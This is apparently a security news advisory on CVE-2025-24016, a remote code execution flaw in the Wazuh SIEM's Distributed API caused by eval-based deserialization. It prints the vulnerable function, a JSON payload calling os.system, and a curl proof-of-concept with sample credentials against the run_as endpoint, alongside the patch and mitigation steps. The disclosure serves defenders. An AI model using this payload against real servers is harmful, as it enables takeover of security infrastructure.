Vulnerability in Wazuh SIEM Exposes Systems to Remote Code Execution

A critical remote code execution (RCE) vulnerability (CVE-2025-24016) has been identified in Wazuh, a widely used open-source security information and event management (SIEM) platform.

Affecting versions 4.4.0 to 4.9.0, this flaw allows attackers with API access to execute arbitrary Python code on vulnerable servers, potentially compromising entire security infrastructures.

The vulnerability, patched in version 4.9.1, stems from unsafe deserialization in the Distributed API (DAPI) component and has been assigned a CVSSv3.1 score of 9.9 (Critical).

Technical Breakdown

The vulnerability resides in the as_wazuh_object function within framework/wazuh/core/cluster/common.py, which processes DAPI requests and responses.

The function uses Python’s eval to deserialize JSON data, enabling malicious payload execution.

Below is the vulnerable code snippet:

pythondef as_wazuh_object(dct: Dict):  
    try:  
        if '__wazuh_datetime__' in dct:  
            return datetime.datetime.fromisoformat(dct['__wazuh_datetime__'])  
        elif '__unhandled_exc__' in dct:  
            exc_data = dct['__unhandled_exc__']  
            return eval(exc_data['__class__'])(*exc_data['__args__'])  
        return dct  
    except (KeyError, AttributeError):  
        return dct  

Here, the eval function dynamically evaluates the __class__ and __args__ values from untrusted input.

Attackers can craft a payload like:

json{  
    "__unhandled_exc__": {  
        "__class__": "os.system",  
        "__args__": ["touch /tmp/pwned"]  
    }  
}  

This executes os.system("touch /tmp/pwned") on the server, creating arbitrary files or running malicious commands.

Exploitation and Impact

Exploitation requires API access, which could be obtained via compromised dashboards, agents, or weak credentials.

A proof-of-concept (PoC) demonstrates exploitation via the run_as endpoint:

bashcurl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" \  
--data '{"__unhandled_exc__":{"__class__": "os.system", "__args__": ["touch /tmp/pwned"]}}' \  
https://<worker-server>:55000/security/user/authenticate/run_as  

Successful attacks enable:

• Full system control: Install malware, tamper with configurations, or exfiltrate sensitive data.
• Lateral movement: Use the compromised server to pivot across networks.
• Disruption of monitoring: Disable alerts, masking further malicious activity.

Organizations using unpatched Wazuh instances risk exposing security logs, compliance data, and operational systems to attackers.

Mitigation and Patch Analysis

Wazuh addressed the flaw in version 4.9.1 by replacing eval it with ast.literal_eval, which safely evaluates literals without executing arbitrary code.

The patched code includes:

pythonexc_dict = {exc_data['__class__']: exc_data['__args__']}  
return ast.literal_eval(json.dumps(exc_dict))  

This modification restricts deserialization to predefined data structures, eliminating RCE risks.

Recommended actions:

1. Immediate upgrade to Wazuh 4.9.1.
2. Restrict API access: Enforce strict authentication (e.g., multi-factor) and network segmentation.
3. Monitor API traffic: Detect anomalies such as unusual payloads or repeated authentication failures.
4. Temporary workarounds: Deploy Web Application Firewalls (WAFs) to block requests containing __unhandled_exc__.

Industry Implications

This vulnerability underscores persistent risks in deserialization processes, reminiscent of historical flaws like Apache Struts’ CVE-2017-5638.

Despite advancements in secure coding practices, such incidents highlight the need for rigorous input validation and adherence to zero-trust principles.

Wazuh’s widespread adoption in threat detection amplifies the urgency for patching.

Administrators must prioritize updates and audit configurations to prevent exploitation.

CVE-2025-24016 represents a severe threat to organizations relying on Wazuh for security monitoring.

With public PoCs and active exploitation likely, immediate remediation is critical.

The patch effectively neutralizes the RCE vector, but complementary measures—hardening API endpoints and enhancing monitoring—are essential to mitigate residual risks.

As SIEM systems remain high-value targets, proactive vulnerability management remains paramount in safeguarding cybersecurity infrastructures.

Also Read: